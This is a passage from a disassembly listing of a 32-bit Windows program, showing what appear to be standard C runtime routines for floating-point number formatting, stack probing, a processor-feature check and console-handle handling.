jnz short loc_410F0B
loc_410F05: ; CODE XREF: sub_410CAD+251�j
mov byte ptr [eax], 30h
dec eax
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F0B: ; CODE XREF: sub_410CAD+256�j
cmp eax, [ebp+arg_4]
jz short loc_410F24
mov cl, [eax]
cmp cl, 39h
jnz short loc_410F1E
add bl, 3Ah
mov [eax], bl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F1E: ; CODE XREF: sub_410CAD+268�j
inc cl
mov [eax], cl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F24: ; CODE XREF: sub_410CAD+261�j
inc byte ptr [eax-1]
loc_410F27: ; CODE XREF: sub_410CAD+1BF�j
; sub_410CAD+227�j ...
cmp [ebp+arg_C], 0
jle short loc_410F3E
push [ebp+arg_C]
push 30h
push esi
call sub_407B70
add esp, 0Ch
add esi, [ebp+arg_C]
loc_410F3E: ; CODE XREF: sub_410CAD+27E�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_410F48
mov esi, eax
loc_410F48: ; CODE XREF: sub_410CAD+297�j
cmp [ebp+arg_10], 0
mov cl, 34h
setz al
dec al
and al, 0E0h
add al, 70h
mov [esi], al
mov eax, [edi]
mov edx, [edi+4]
inc esi
call sub_4118E0
xor ebx, ebx
and eax, 7FFh
and edx, ebx
sub eax, [ebp+var_14]
push ebx
pop ecx
sbb edx, ecx
js short loc_410F82
jg short loc_410F7C
cmp eax, ebx
jb short loc_410F82
loc_410F7C: ; CODE XREF: sub_410CAD+2C9�j
mov byte ptr [esi], 2Bh
inc esi
jmp short loc_410F8C
; ---------------------------------------------------------------------------
loc_410F82: ; CODE XREF: sub_410CAD+2C7�j
; sub_410CAD+2CD�j
mov byte ptr [esi], 2Dh
inc esi
neg eax
adc edx, ebx
neg edx
loc_410F8C: ; CODE XREF: sub_410CAD+2D3�j
cmp edx, ebx
mov edi, esi
mov byte ptr [esi], 30h
jl short loc_410FB9
mov ecx, 3E8h
jg short loc_410FA0
cmp eax, ecx
jb short loc_410FB9
loc_410FA0: ; CODE XREF: sub_410CAD+2ED�j
push ebx
push ecx
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
inc esi
cmp esi, edi
mov [ebp+var_10], edx
mov eax, ecx
mov edx, ebx
jnz short loc_410FC4
loc_410FB9: ; CODE XREF: sub_410CAD+2E6�j
; sub_410CAD+2F1�j
test edx, edx
jl short loc_410FDB
jg short loc_410FC4
cmp eax, 64h
jb short loc_410FDB
loc_410FC4: ; CODE XREF: sub_410CAD+30A�j
; sub_410CAD+310�j
push 0
push 64h
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov edx, ebx
loc_410FDB: ; CODE XREF: sub_410CAD+30E�j
; sub_410CAD+315�j
cmp esi, edi
jnz short loc_410FEA
test edx, edx
jl short loc_411002
jg short loc_410FEA
cmp eax, 0Ah
jb short loc_411002
loc_410FEA: ; CODE XREF: sub_410CAD+330�j
; sub_410CAD+336�j
push 0
push 0Ah
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov [ebp+var_10], ebx
loc_411002: ; CODE XREF: sub_410CAD+334�j
; sub_410CAD+33B�j
add al, 30h
mov [esi], al
mov byte ptr [esi+1], 0
loc_41100A: ; CODE XREF: sub_410CAD+10B�j
; sub_410CAD+126�j
cmp [ebp+var_18], 0
jz short loc_411017
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411017: ; CODE XREF: sub_410CAD+361�j
xor eax, eax
loc_411019: ; CODE XREF: sub_410CAD+D0�j
; sub_410CAD+DD�j
pop ebx
loc_41101A: ; CODE XREF: sub_410CAD+58�j
pop edi
pop esi
leave
retn
sub_410CAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41101E proc near ; CODE XREF: sub_411113+A2�p
; sub_4111CC+C3�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_C]
mov ebx, eax
mov esi, [ebx+4]
mov edi, ecx
lea ecx, [ebp+var_10]
dec esi
call sub_40271F
test edi, edi
jnz short loc_41106B
loc_41103E: ; CODE XREF: sub_41101E+51�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_411064
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411064: ; CODE XREF: sub_41101E+3D�j
mov eax, esi
jmp loc_41110E
; ---------------------------------------------------------------------------
loc_41106B: ; CODE XREF: sub_41101E+1E�j
cmp [ebp+arg_0], 0
jbe short loc_41103E
cmp [ebp+arg_8], 0
jz short loc_41108F
cmp esi, [ebp+arg_4]
jnz short loc_41108F
xor eax, eax
cmp dword ptr [ebx], 2Dh
setz al
add eax, esi
add eax, edi
mov byte ptr [eax], 30h
mov byte ptr [eax+1], 0
loc_41108F: ; CODE XREF: sub_41101E+57�j
; sub_41101E+5C�j
cmp dword ptr [ebx], 2Dh
mov esi, edi
jnz short loc_41109C
mov byte ptr [edi], 2Dh
lea esi, [edi+1]
loc_41109C: ; CODE XREF: sub_41101E+76�j
mov eax, [ebx+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_4110B3
mov eax, esi
call sub_410A1B
mov byte ptr [esi], 30h
inc esi
jmp short loc_4110B5
; ---------------------------------------------------------------------------
loc_4110B3: ; CODE XREF: sub_41101E+86�j
add esi, eax
loc_4110B5: ; CODE XREF: sub_41101E+93�j
cmp [ebp+arg_4], 0
jle short loc_4110FF
mov eax, esi
call sub_410A1B
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
mov ebx, [ebx+4]
inc esi
test ebx, ebx
jge short loc_4110FF
neg ebx
cmp [ebp+arg_8], 0
jnz short loc_4110E6
cmp [ebp+arg_4], ebx
jl short loc_4110E9
loc_4110E6: ; CODE XREF: sub_41101E+C1�j
mov [ebp+arg_4], ebx
loc_4110E9: ; CODE XREF: sub_41101E+C6�j
mov edi, [ebp+arg_4]
mov eax, esi
call sub_410A1B
push edi
push 30h
push esi
call sub_407B70
add esp, 0Ch
loc_4110FF: ; CODE XREF: sub_41101E+9B�j
; sub_41101E+B9�j
cmp [ebp+var_4], 0
jz short loc_41110C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_41110C: ; CODE XREF: sub_41101E+E5�j
xor eax, eax
loc_41110E: ; CODE XREF: sub_41101E+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_41101E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411113 proc near ; CODE XREF: sub_4112C4+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_411163
loc_41114B: ; CODE XREF: sub_411113+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_411163: ; CODE XREF: sub_411113+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_41114B
cmp eax, 0FFFFFFFFh
jnz short loc_411173
or eax, eax
jmp short loc_41117E
; ---------------------------------------------------------------------------
loc_411173: ; CODE XREF: sub_411113+5A�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
loc_41117E: ; CODE XREF: sub_411113+5E�j
mov esi, [ebp+arg_C]
lea ecx, [ebp+var_2C]
push ecx
mov ecx, [ebp+var_28]
add ecx, esi
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
add eax, edi
push eax
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_4111A8
mov [edi], bl
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_4111A8: ; CODE XREF: sub_411113+8F�j
push [ebp+arg_10]
lea eax, [ebp+var_2C]
push ebx
push esi
push [ebp+arg_8]
mov ecx, edi
call sub_41101E
add esp, 10h
loc_4111BD: ; CODE XREF: sub_411113+4E�j
; sub_411113+93�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111CC proc near ; CODE XREF: sub_4112C4+4A�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 16h
pop edi
push edi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp esi, ebx
jnz short loc_41121F
loc_411204: ; CODE XREF: sub_4111CC+58�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
jmp loc_4112B5
; ---------------------------------------------------------------------------
loc_41121F: ; CODE XREF: sub_4111CC+36�j
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jbe short loc_411204
mov eax, [ebp+var_2C]
dec eax
mov [ebp+var_20], eax
xor eax, eax
cmp [ebp+var_30], 2Dh
setz al
cmp ecx, 0FFFFFFFFh
lea edi, [eax+esi]
jnz short loc_411242
or ecx, ecx
jmp short loc_411244
; ---------------------------------------------------------------------------
loc_411242: ; CODE XREF: sub_4111CC+70�j
sub ecx, eax
loc_411244: ; CODE XREF: sub_4111CC+74�j
lea eax, [ebp+var_30]
push eax
push [ebp+arg_C]
push ecx
push edi
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_41125D
mov [esi], bl
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_41125D: ; CODE XREF: sub_4111CC+8B�j
mov eax, [ebp+var_2C]
dec eax
cmp [ebp+var_20], eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_411299
cmp eax, [ebp+arg_C]
jge short loc_411299
cmp cl, bl
jz short loc_41127F
loc_411275: ; CODE XREF: sub_4111CC+AE�j
mov al, [edi]
inc edi
test al, al
jnz short loc_411275
mov [edi-2], bl
loc_41127F: ; CODE XREF: sub_4111CC+A7�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push [ebp+arg_C]
mov ecx, esi
push [ebp+arg_8]
call sub_41101E
add esp, 10h
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_411299: ; CODE XREF: sub_4111CC+9E�j
; sub_4111CC+A3�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push eax
push [ebp+arg_10]
mov eax, esi
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_4112B5: ; CODE XREF: sub_4111CC+4E�j
; sub_4111CC+8F�j ...
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4111CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112C4 proc near ; CODE XREF: sub_41134A+17�p
; DATA XREF: sub_40F70B+37�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
cmp eax, 65h
jz short loc_41132E
cmp eax, 45h
jz short loc_41132E
cmp eax, 66h
jnz short loc_4112F2
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411113
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4112F2: ; CODE XREF: sub_4112C4+13�j
cmp eax, 61h
jz short loc_411315
cmp eax, 41h
jz short loc_411315
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4111CC
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_411315: ; CODE XREF: sub_4112C4+31�j
; sub_4112C4+36�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410CAD
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_41132E: ; CODE XREF: sub_4112C4+9�j
; sub_4112C4+E�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
loc_411345: ; CODE XREF: sub_4112C4+4F�j
; sub_4112C4+68�j
add esp, 18h
pop ebp
retn
sub_4112C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41134A proc near ; DATA XREF: sub_40F70B�o
; .data:off_423F80�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4112C4
add esp, 1Ch
pop ebp
retn
sub_41134A endp
; =============== S U B R O U T I N E =======================================
sub_41136B proc near ; CODE XREF: sub_40F76B+16�p
push esi
push 30000h
push 10000h
xor esi, esi
push esi
call sub_4118FF
add esp, 0Ch
test eax, eax
jz short loc_411392
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_411392: ; CODE XREF: sub_41136B+18�j
pop esi
retn
sub_41136B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411394 proc near ; CODE XREF: sub_4113D0:loc_4113F4�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_41EE70
fstp [ebp+var_10]
fld ds:dbl_41EE68
fstp [ebp+var_18]
fld [ebp+var_18]
fdiv [ebp+var_10]
fmul [ebp+var_10]
fsubr [ebp+var_18]
fstp [ebp+var_8]
fld1
fcomp [ebp+var_8]
fnstsw ax
test ah, 5
jp short loc_4113CC
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_4113CC: ; CODE XREF: sub_411394+31�j
xor eax, eax
leave
retn
sub_411394 endp
; =============== S U B R O U T I N E =======================================
sub_4113D0 proc near ; CODE XREF: sub_40F76B+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41D0E4 ; GetModuleHandleA
test eax, eax
jz short loc_4113F4
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41D0EC ; GetProcAddress
test eax, eax
jz short loc_4113F4
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4113F4: ; CODE XREF: sub_4113D0+D�j
; sub_4113D0+1D�j
jmp sub_411394
sub_4113D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411400 proc near ; CODE XREF: sub_4104B0+11�j
; .text:004104D7�j ...
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_411414: ; CODE XREF: sub_411400+29�j
cmp ecx, eax
jb short loc_411422
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_411422: ; CODE XREF: sub_411400+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_411414
sub_411400 endp
; =============== S U B R O U T I N E =======================================
sub_41142B proc near ; CODE XREF: sub_4104DC+24�p
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push 40000000h
push offset aConout ; "CONOUT$"
call ds:dword_41D06C ; CreateFileA
mov dword_424224, eax
retn
sub_41142B endp
; =============== S U B R O U T I N E =======================================
sub_41144A proc near ; DATA XREF: .rdata:0041D2E0�o
mov eax, dword_424224
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41D0DC
jz short loc_411463
cmp eax, 0FFFFFFFEh
jz short loc_411463
push eax
call esi ; CloseHandle
loc_411463: ; CODE XREF: sub_41144A+F�j
; sub_41144A+14�j
mov eax, dword_424220
cmp eax, 0FFFFFFFFh
jz short loc_411475
cmp eax, 0FFFFFFFEh
jz short loc_411475
push eax
call esi ; CloseHandle
loc_411475: ; CODE XREF: sub_41144A+21�j
; sub_41144A+26�j
pop esi
retn
sub_41144A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411480 proc near ; CODE XREF: sub_410CAD+102�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_4114A7
xor eax, eax
jmp short loc_4114A9
; ---------------------------------------------------------------------------
loc_4114A7: ; CODE XREF: sub_411480+21�j
mov eax, edi
loc_4114A9: ; CODE XREF: sub_411480+25�j
cld
pop edi
leave
retn
sub_411480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114AD proc near ; CODE XREF: sub_4109C4+15�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411969
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_41152A
cmp eax, 1
jnz short loc_411515
loc_411504: ; CODE XREF: sub_4114AD+87�j
cmp [ebp+var_18], bl
jz short loc_411510
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411510: ; CODE XREF: sub_4114AD+5A�j
push 3
loc_411512: ; CODE XREF: sub_4114AD+7B�j
pop eax
jmp short loc_411544
; ---------------------------------------------------------------------------
loc_411515: ; CODE XREF: sub_4114AD+55�j
cmp eax, 2
jnz short loc_411536
loc_41151A: ; CODE XREF: sub_4114AD+81�j
cmp [ebp+var_18], bl
jz short loc_411526
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411526: ; CODE XREF: sub_4114AD+70�j
push 4
jmp short loc_411512
; ---------------------------------------------------------------------------
loc_41152A: ; CODE XREF: sub_4114AD+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_41151A
test byte ptr [ebp+var_14], 2
jnz short loc_411504
loc_411536: ; CODE XREF: sub_4114AD+6B�j
cmp [ebp+var_18], bl
jz short loc_411542
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411542: ; CODE XREF: sub_4114AD+8C�j
xor eax, eax
loc_411544: ; CODE XREF: sub_4114AD+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4114AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411553 proc near ; CODE XREF: sub_4109C4+2E�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411EAB
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_4115D0
cmp eax, 1
jnz short loc_4115BB
loc_4115AA: ; CODE XREF: sub_411553+87�j
cmp [ebp+var_18], bl
jz short loc_4115B6
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115B6: ; CODE XREF: sub_411553+5A�j
push 3
loc_4115B8: ; CODE XREF: sub_411553+7B�j
pop eax
jmp short loc_4115EA
; ---------------------------------------------------------------------------
loc_4115BB: ; CODE XREF: sub_411553+55�j
cmp eax, 2
jnz short loc_4115DC
loc_4115C0: ; CODE XREF: sub_411553+81�j
cmp [ebp+var_18], bl
jz short loc_4115CC
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115CC: ; CODE XREF: sub_411553+70�j
push 4
jmp short loc_4115B8
; ---------------------------------------------------------------------------
loc_4115D0: ; CODE XREF: sub_411553+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_4115C0
test byte ptr [ebp+var_14], 2
jnz short loc_4115AA
loc_4115DC: ; CODE XREF: sub_411553+6B�j
cmp [ebp+var_18], bl
jz short loc_4115E8
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115E8: ; CODE XREF: sub_411553+8C�j
xor eax, eax
loc_4115EA: ; CODE XREF: sub_411553+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115F9 proc near ; CODE XREF: sub_410BC1+96�p
; sub_411113+85�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_C]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ecx+0Ch]
jnz short loc_41162C
loc_41160E: ; CODE XREF: sub_4115F9+36�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_411618: ; CODE XREF: sub_4115F9+59�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp loc_4116B1
; ---------------------------------------------------------------------------
loc_41162C: ; CODE XREF: sub_4115F9+13�j
cmp [ebp+arg_4], ebx
jbe short loc_41160E
mov edx, [ebp+arg_8]
cmp edx, ebx
mov [esi], bl
jle short loc_41163E
mov eax, edx
jmp short loc_411640
; ---------------------------------------------------------------------------
loc_41163E: ; CODE XREF: sub_4115F9+3F�j
xor eax, eax
loc_411640: ; CODE XREF: sub_4115F9+43�j
inc eax
cmp [ebp+arg_4], eax
ja short loc_411654
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_411618
; ---------------------------------------------------------------------------
loc_411654: ; CODE XREF: sub_4115F9+4B�j
cmp edx, ebx
mov byte ptr [esi], 30h
lea eax, [esi+1]
jle short loc_411678
loc_41165E: ; CODE XREF: sub_4115F9+7A�j
mov cl, [edi]
cmp cl, bl
jz short loc_41166A
movsx ecx, cl
inc edi
jmp short loc_41166D
; ---------------------------------------------------------------------------
loc_41166A: ; CODE XREF: sub_4115F9+69�j
push 30h
pop ecx
loc_41166D: ; CODE XREF: sub_4115F9+6F�j
mov [eax], cl
inc eax
dec edx
cmp edx, ebx
jg short loc_41165E
mov ecx, [ebp+arg_C]
loc_411678: ; CODE XREF: sub_4115F9+63�j
cmp edx, ebx
mov [eax], bl
jl short loc_411690
cmp byte ptr [edi], 35h
jl short loc_411690
jmp short loc_411688
; ---------------------------------------------------------------------------
loc_411685: ; CODE XREF: sub_4115F9+93�j
mov byte ptr [eax], 30h
loc_411688: ; CODE XREF: sub_4115F9+8A�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_411685
inc byte ptr [eax]
loc_411690: ; CODE XREF: sub_4115F9+83�j
; sub_4115F9+88�j
cmp byte ptr [esi], 31h
jnz short loc_41169A
inc dword ptr [ecx+4]
jmp short loc_4116AF
; ---------------------------------------------------------------------------
loc_41169A: ; CODE XREF: sub_4115F9+9A�j
lea edi, [esi+1]
push edi
call sub_404130
inc eax
push eax
push edi
push esi
call sub_407370
add esp, 10h
loc_4116AF: ; CODE XREF: sub_4115F9+9F�j
xor eax, eax
loc_4116B1: ; CODE XREF: sub_4115F9+2E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4115F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116B6 proc near ; CODE XREF: sub_411771+24�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
movzx eax, word ptr [edx+6]
push ebx
mov ecx, eax
push esi
push edi
shr ecx, 4
and eax, 8000h
mov edi, 7FFh
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_411704
cmp ebx, edi
jz short loc_4116FD
add ecx, 3C00h
jmp short loc_411725
; ---------------------------------------------------------------------------
loc_4116FD: ; CODE XREF: sub_4116B6+3D�j
mov edi, 7FFFh
jmp short loc_411728
; ---------------------------------------------------------------------------
loc_411704: ; CODE XREF: sub_4116B6+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41171C
cmp edx, ebx
jnz short loc_41171C
mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+arg_4]
mov [eax+4], ebx
mov [eax], ebx
jmp short loc_411768
; ---------------------------------------------------------------------------
loc_41171C: ; CODE XREF: sub_4116B6+52�j
; sub_4116B6+56�j
add ecx, 3C01h
mov [ebp+var_4], ebx
loc_411725: ; CODE XREF: sub_4116B6+45�j
movzx edi, cx
loc_411728: ; CODE XREF: sub_4116B6+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_411763
loc_411744: ; CODE XREF: sub_4116B6+AB�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
add edx, edx
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_411744
loc_411763: ; CODE XREF: sub_4116B6+8C�j
mov ecx, [ebp+arg_4]
or ecx, edi
loc_411768: ; CODE XREF: sub_4116B6+64�j
pop edi
pop esi
mov [eax+8], cx
pop ebx
leave
retn
sub_4116B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411771 proc near ; CODE XREF: sub_410BC1+2A�p
; sub_411113+2A�p ...
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
push ebx
mov ebx, [ebp+arg_8]
push esi
mov [ebp+var_30], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4116B6
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
